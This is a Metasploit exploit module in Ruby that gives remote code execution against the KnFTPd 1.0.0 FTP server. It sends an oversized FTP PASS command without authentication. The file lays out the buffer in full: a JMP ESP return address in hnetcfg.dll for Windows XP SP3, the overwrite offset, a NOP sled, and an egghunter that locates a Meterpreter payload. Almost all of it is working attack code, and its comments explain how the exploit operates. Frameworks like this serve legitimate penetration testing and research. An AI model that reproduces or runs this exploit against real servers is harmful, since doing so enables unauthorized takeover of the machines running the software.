##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

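class MetasploitModule < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Ftp
	include Msf::Exploit::Remote::Egghunter

	# Module metadata. The single target hard-codes the distance from the start
	# of the overflowed buffer to the saved return address ('Offset') and a
	# JMP ESP gadget ('Ret') that is only valid for the listed OS/DLL build.
	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'KnFTPd 1.0.0 Server Remote Buffer Overflow Vulnerability',
			'Description'	=> %q{
						This module exploits a vulnerability in the KnFTP FTP service without
					authenticated required, A long FTP command value will result in a
					buffer overflow. This Allows you to gain control as the user who
					started the application. 

			},
			'License'		=> MSF_LICENSE,
			'Author'		=>
				[
					'Qixu Liu', # Original discovery
					'Blake', # Original exploit
					'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
				],
			'Version'		=> '$Revision$',
			'References'	=>
				[
					[ 'URL', 'http://secunia.com/advisories/45907' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/17819/' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/17856/' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'DisablePayloadHandler' => 'false',
				},
			'Platform'	=> 'win',
			'Payload'	=>
				{
					# NUL terminates the C string the server copies, so it can never
					# appear in the payload, egg or egghunter.
					'BadChars' => "\x00",
					'InitialAutoRunScript' => 'migrate -f',
				},

			'Targets'		=>
				[
					[ 'Windows XP SP3 English',
						{
							'Ret'   	=>	0x662eb24f, # JMP ESP in hnetcfg.dll
							'Offset'	=>	284
						}
					],
				],
			'Privileged'	=> false,
			'DisclosureDate'	=> 'Sep 02 2011',
			'DefaultTarget'	=> 0))

	end

	# Builds and sends the overflow string in a single FTP PASS command.
	#
	# Buffer layout (offsets relative to the start of the PASS argument):
	#   [ egg tag + payload ][ random filler up to 'Offset' ][ Ret = JMP ESP ][ 4 NOPs ][ egghunter ]
	#
	# After the overwritten return address is consumed, ESP points just past it,
	# so JMP ESP lands in the NOP sled and runs the egghunter, which scans memory
	# for the tagged payload placed at the front of the buffer (or any other copy
	# the server kept of the command).
	def exploit

		# Used egghunter since payload space between start of buffer and EIP is too small for
		# meterpreter payload
		hunter, egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

		# If the egg does not fit in front of the return address the filler length
		# below goes negative and 'Ret' no longer lands on the saved EIP, leaving
		# only a silent crash. Refuse that up front with a clear explanation.
		filler_len = target['Offset'] - egg.length
		if filler_len < 0
			fail_with(Failure::BadConfig,
				"Encoded payload plus egg tag is #{egg.length} bytes but only #{target['Offset']} bytes are available before the return address; pick a smaller payload")
		end

		buffer = egg
		buffer << rand_text_alpha(filler_len)
		buffer << [target.ret].pack('V')
		buffer << make_nops(4)
		buffer << hunter

		# If you overwrite SEH it only adds 65 bytes past EIP

		print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")

		connect
		# Second argument: wait for (and discard) the server's reply line.
		send_cmd(['PASS', buffer], true)
		handler
		disconnect
	end
end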


=begin
Module submission / review ticket: http://dev.metasploit.com/redmine/issues/5471
=end